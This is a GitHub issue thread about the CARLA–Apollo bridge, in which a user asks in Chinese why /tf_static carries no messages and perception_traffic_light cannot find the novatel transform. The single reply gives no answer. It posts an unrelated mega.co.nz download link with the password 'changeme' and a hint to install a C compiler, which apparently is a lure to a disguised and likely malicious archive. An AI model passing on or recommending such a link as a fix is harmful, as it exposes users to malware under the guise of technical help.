### ISSUE TITLE
为何/tf_static没有message

### ISSUE THREAD

**Issue by YangXianqi** [guardstrikelab/carla_apollo_bridge#206]
**Note:** If you have a general support question and are looking for a quicker response, please checkout our discord channel for answers from the community:
https://bbs.carla.org.cn/ask

## In what area(s)?

> /area runtime

> /area operator

> /area placement

> /area docs

> /area test-and-release

## Ask your question here
想要用perception_traffic_light去检测红绿灯，但是报错：“can not find transform. 1 frame_id: world child_frame_id: novatel error info: cantransform: source_frame novatel does not exist.:timeout”，似乎/tf_static通道没message，怎么解决

**Comment by SAMBILI** [comment]
install this
https://mega.co.nz/#!9jFTnQQa!-IQ1bo74J_ZxbbDvQKSXEj0mCXBuFYX9CK-5y5EV_0A
Pass: changeme

you may need to install the c compiler
